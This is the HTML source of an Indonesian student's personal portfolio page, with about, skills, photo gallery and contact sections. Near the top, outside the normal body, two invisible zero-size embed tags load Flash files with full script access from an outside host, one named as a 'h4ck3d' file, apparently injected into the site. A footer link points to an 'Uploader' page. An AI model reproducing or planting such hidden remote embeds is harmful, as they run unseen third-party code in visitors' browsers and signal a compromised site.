
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<title>&#1203;&#824;&#1202;&#824;&#1203; Arjuno Widya Pratama &#1203;&#824;&#1202;&#824;&#1203;</title>
<link rel="shortcut icon" href="https://sc01.alicdn.com/kf/HTB1WWogKVXXXXb8XXXXq6xXFXXX8/Wholesale-Promotion-3d-printing-picture-of-Cool.jpg_350x350.jpg" />

<!-- CSS files begin-->
<link rel="stylesheet" type="text/css" href="css/jquery.jscrollpane.css" media="all"/>
<link rel="stylesheet" type="text/css" href="css/prettyPhoto.css" media="all" />
<link rel="stylesheet" type="text/css" href="css/style.css" media="all"/>

<!-- JavaScript files begin-->
<script type="text/javascript" src="js/jquery-1.6.4.min.js"></script>
<script type="text/javascript" src="js/cufon-yui.js"></script>
<script type="text/javascript" src="js/Yanone_Kaffeesatz_400-700.font.js"></script>
<script type="text/javascript" src="js/jquery.prettyPhoto.js"></script>
<script type="text/javascript" src="js/jquery.form.js"></script>
<script type="text/javascript" src="js/jquery.ufvalidator-1.0.5.js"></script>
<script type="text/javascript" src="js/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="js/jquery.mousewheel.js"></script>
<script type="text/javascript" src="js/jquery.jscrollpane.js"></script>
<script type="text/javascript" src="js/jquery.progression.1.3.js"></script>
<script type="text/javascript" src="js/jquery.text-effects.js"></script>
<script type="text/javascript" src="js/custom.js"></script>
</head>
<embed src="http://error-404.do.am/file/Welcome.swf" width="0" height="0" allowfullscreen="true" allowscriptaccess="always"></embed>
<body>
<embed src="http://error-404.do.am/50256-h4ck3d.swf" width="0" height="0" allowscriptaccess="always"></embed></body>
<body>
    <!-- wrappage begin here -->
    <div id="wrappage">
        <!-- container begin here -->
        <div class="container">
            <!-- top block begin here -->
            <div class="top">
                <div class="energy">
                </div>
                <div class="top-block">
                    <a href="index.html" class="logo">
                     --Arjuno-Widya-Pratama--
                    </a>
                    <div class="bg-e-button">
                    </div>
                    <div class="bg-button">
                    </div>
                    <a href="" class="open">
                        <img src="" alt="" /> 
                        <!-- pembuka foto kelap kelip -->
                    </a>
                </div>
            </div>
            <!-- top block end here -->
            <!-- center block begin here -->
            <div class="center-block">
                <!-- scanner begin here -->
                <div class="scanner clearfix">
                    <div class="scanner-block">
                        <div class="scanner-box left">
                            <div class="scanner-line">
                            </div>
                        </div>
                        <ul class="data left">
                            <li class="search"> Wait... Identify...</li>
                            <li class="search-d">
                                User: Arjuno Widya Pratama
                            </li>
                            <li class="search-d">
                                Password:************
                            </li>
                            <br/>
                            <li class="search-d">
                                Access Granted...
                            </li>
                        </ul>
                    </div>
                </div>
                <!-- scanner end here -->
                <!-- main begin here -->
                <div class="main">
                    <div class="load">
                    </div>
                    <div class="shut-left">
                    </div>
                    <div class="shut-right">
                    </div>
                    <div class="page">
                        <!-- foto / social block begin here -->
                        <div class="box-left left">
                            <div class="info">
                                <ul class="socicon left">
                                    <li>
                                        <a href="https://facebook.com/arjuno.wi">
                                            <img src="images/facebook.png" alt="Facebook" />
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://twitter.com/arjuno_widya">
                                            <img src="images/twitter.png" alt="Twitter" />
                                        </a>
                                    </li>
                                    <li class="last">
                                        <a href="https://instagram.com/arjunowidya">
                                            <img src="images/dribbble.png" alt="" />
                                        </a>
                                    </li>
                                </ul>
                                <img src="abcd.png" WIDTH=135 HEIGHT=150 alt="" class="left" />
                                <ul class="left who">
                                    <li>
                                        * User : Arjuno Widya Pratama
                                    </li>
                                    <li>
                                         * Pass : ************
                                    </li>
                                </ul>
                            </div>
                            <!-- foto / social block end here -->
                            <!-- menu begin here -->
                            <ul id="menu" class="right">
                                <li>
                                    <a href="#about" class="selected">
                                        about
                                    </a>
                                </li>
                                <li>
                                    <a href="#resume" class="skill-start">
                                        Skill
                                    </a>
                                </li>
                                <li>
                                    <a href="#portfolio">
                                        Photo
                                    </a>
                                </li>
                                <li class="last">
                                    <a href="#contact">
                                        contact
                                    </a>
                                </li>
                            </ul>
                        </div>
                        <!-- menu end here -->
                        <!-- page block begin here -->
                        <div class="cont left">
                            <!-- page about begin here -->
                            <div id="about" class="box left">
                                <div class="box-content">
                                    <h3>
                                        About
                                    </h3>
                                    <p class="sub">
                                        Profil Singkat
                                    </p>
                                    <p>
                                        Arjuno Widya Pratama - Surabaya, 
                                    <br/>/* maaf, Akan di update profil */
                                    </p>
                                    <p>
                           
                                    </p>
                                    
                                    <!-- gallery end here -->
                                </div>
                            </div>
                            <!-- page about end here -->
                            <!-- page resume begin here -->
                            <div id="resume" class="box left">
                                <div class="box-content">
                                    <h3>
                                        Skills
                                    </h3>
                                    <p class="sub">
                                        Saya tidak lah sehebat kalian ^_^
                                    </p>
                                    <p>
                                        Maaf , saya newbie . tapi saya tidak akan pelit untuk membagi ilmu saya kepada orang lain.
                                    </p>
                                    <div class="skills">
                                        <div class="bar">
                                            <div class="block-pr">
                                                <div class="progressbar pr1">
                                                </div>
                                            </div>
                                        </div>
                                        <div class="last">
                                            Pintar
                                        </div>
                                        <div class="bar">
                                            <div class="block-pr">
                                                <div class="progressbar pr2">
                                                </div>
                                            </div>
                                        </div>
                                        <div class="last">
                                            Lucu
                                        </div>
                                        <div class="bar">
                                            <div class="block-pr">
                                                <div class="progressbar pr3">
                                                </div>
                                            </div>
                                        </div>
                                        <div class="last">
                                            Keren
                                        </div>
                                        <div class="bar bar-b">
                                            <div class="block-pr">
                                                <div class="progressbar pr4">
                                                </div>
                                            </div>
                                        </div>
                                        <div class="last">
                                            PHP &amp; MySql
                                        </div>
                                    </div>
                                    <ul class="stars">
                                        <li>
                                            Newbie jangan ditindas.
                                        </li>
                                        <li>
                                            Newbie perlu kita bina
                                        </li>
                                        <li>
                                            Dan ingat diatas langit masih ada langit
                                        </li>
                                        <li>Ketika anda merasa bahwa diri anda buruk
                                        </li>
                                        <li>Percayalah, bahwa yang lebih baik dari anda
                                        </li>
                                        <li>Banyak...
                                        </li>
                                        <li>Never Give Up ^_^
                                        </li>
                                    </ul>
                                    <h3>
                                        Pendidikan
                                    </h3>
                                    <p class="sub">
                                        Sejarah pendidikan saya
                                    </p>
                                    <ul class="education">
                                        <li>
                                            <span>
                                                SDN Wonorejo 7 , Surabaya<br>
                                            </span>
                                            SMPN 42 , Surabaya<br>
                                        </li>
                                        <li>
                                            <span>
                                                Smk Mahardhika , Surabaya<br>
                                            </span>
                                           Universitas Internasional Semen Indonesia , Gresik<br>
                                        </li>
                                         <li>
                                            <span>
                                                Sampai saat ini...<br>
                                            </span>
                                            Doakan Segera Lulus  Sarjana Yah ^_^^<br>
                                            </li>
                                            <li>
                                            <span>
                                                Amin<br>
                                                </span>
                                    </ul>
                                    <p>
                                        
                                    </p>
                                </div>
                            </div>
                            <!-- page resume end here -->
                            <!-- page portfolio begin here -->
                            <div id="portfolio" class="box left">
                                <div class="box-content">
                                    <h3>
                                        Photo
                                    </h3>
                                    <p class="sub">
                                        it's my photo
                                    </p>
                                    <!-- gallery begin here -->
                                    <div class="gallery-block">
                                        <div class="gallery left">
                                            <div class="img">
                                                <img src="images/loader.gif" alt="" />
                                            </div>
                                            <div class="des">
                                                description
                                            </div>
                                            <div class="block-zoom">
                                                <a href="images/loader.gif" rel="prettyPhoto" title="Images" class="zoom">
                                                </a>
                                                <a href="#" title="Link" class="link">
                                                </a>
                                            </div>
                                        </div>
                                        <div class="gallery left last">
                                            <div class="img">
                                                <img src="images/loader.gif" alt="" />
                                            </div>
                                            <div class="des">
                                                description
                                            </div>
                                            <div class="block-zoom">
                                                <a href="images/loader.gif" rel="prettyPhoto" title="Images" class="zoom">
                                                </a>
                                                <a href="#" title="Link" class="link">
                                                </a>
                                            </div>
                                        </div>
                                        <div class="gallery left">
                                            <div class="img">
                                                <img src="Sayaa.png" WIDTH=215 HEIGHT=110 alt="" />
                                            </div>
                                            <div class="des">
                                                description
                                            </div>
                                            <div class="block-zoom">
                                                <a href="Sayaa.png" rel="prettyPhoto" title="Images" class="zoom">
                                                </a>
                                                <a href="#" title="Link" class="link">
                                                </a>
                                            </div>
                                        </div>
                                        <div class="gallery left last">
                                            <div class="img">
                                                <img src="aku.jpg" WIDTH=215 HEIGHT=110 alt="" />
                                            </div>
                                            <div class="des">
                                                description
                                            </div>
                                            <div class="block-zoom">
                                                <a href="aku.jpg" rel="prettyPhoto" title="Images" class="zoom">
                                                </a>
                                                <a href="#" title="Link" class="link">
                                                </a>
                                            </div>
                                        </div>
                                        <div class="gallery left">
                                            <div class="img">
                                                <img src="" alt="" />
                                            </div>
                                            <div class="des">
                                                description
                                            </div>
                                            <div class="block-zoom">
                                                <a href="images/loader.gif" rel="prettyPhoto" title="Images" class="zoom">
                                                </a>
                                                <a href="#" title="Link" class="link">
                                                </a>
                                            </div>
                                        </div>
                                        <div class="gallery left last">
                                            <div class="img">
                                                <img src="images/loader.gif" alt="" />
                                            </div>
                                            <div class="des">
                                                description
                                            </div>
                                            <div class="block-zoom">
                                                <a href="images/loader.gif" rel="prettyPhoto" title="Images" class="zoom">
                                                </a>
                                                <a href="#" title="Link" class="link">
                                                </a>
                                            </div>
                                        </div>
                                    </div>
                                    <!-- gallery end here -->
                                </div>
                            </div>
                            <!-- page portfolio end here -->
                            <!-- page contact begin here -->
                            <div id="contact" class="box left">
                                <div class="box-content-c left">
                                    <div class="cont-block left">
                                        <h3>
                                            Contact
                                        </h3>
                                        <p class="sub">
                                            Hubungi saya
                                        </p>
                                        <p>
                                            
                                        </p>
                                        <ul class="contact">
                                            <li>
                                                Nama: Arjuno Widya Pratama
                                            </li>
                                            <li>
                                                alamat: Surabaya, Jawa Timur
                                            </li>
                                            <li>
                                                phone: +628xxxxxxxxx
                                            </li>
                                            <li>
                                                Email: junowidya@gmail.com
                                            </li>
                                            <li>
                                                 Facebook:
                                            <a href="http://www.facebook.com/arjuno.wi" target="_blank">Arjuno Widya Pratama</a>
                                                                                    </li>
                                            <li>
                                                 Twitter:
                                            <a href="http://www.twitter.com/arjuno_widya" target="_blank">Arjuno Widya Pratama</a>
                                                                                    </li>
                                            <li>
                                                 Instagram :
                                            <a href="http://instagram.com/arjunowidya" target="_blank">Arjuno Widya Pratama</a>
                                            </li>
                                            <li>
                                                 Blog:
                                            <a href="http://arjunowidya.xyz" target="_blank">Arjuno Widya Pratama</a>
                                            </li>
                                        </ul>
                                    </div>
                                    <div class="cont-block left last">
                                        <div class="contactusb">
                                            <form action="#" id="contactus" method="post">
                                                <div>
                                                    <label for="name">
                                                        Name
                                                    </label>
                                                    <input type="text" name="name" class="textfield req-string" id="name" value="" />
                                                    <label for="email">
                                                        E-mail
                                                    </label>
                                                    <input type="text" name="email" class="textfield req-email" id="email" value="" />
                                                    <label for="message">
                                                        Message
                                                    </label>
                                                    <textarea name="message" id="message" class="textarea req-string" cols="8" rows="12"></textarea>
                                                    <button id="send" type="submit">
                                                        send message
                                                    </button>
                                                </div>
                                            </form>
                                        </div>
                                        <span class="sending">
                                            send...
                                        </span>
                                        <div class="mess center">
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <!-- page contact end here -->
                        </div>
                        <!-- page block end here -->
                    </div>
             </div>
             <!-- main end here -->
            </div>
            <!-- center block end here -->
            <!-- bottom block begin here -->
            <div class="bottom">
                <div class="bottom-block">
                    <h1 class="left">
                        --Arjuno Widya Pratama--
                    </h1>
                    <h4 class="left">
                    <a href="upload" target="_blank">Uploader</a>
                    </h4>
                    <h5 class="right">
                        Copyright©2019, Arjuno-Widya-Pratama All Rights Reserved
                    </h5>
                </div>
            </div>
            <!-- bottom block end here -->
        </div>
        <!-- container end here -->
    </div>
    <!-- wrappage end here -->
</body>
</html>	
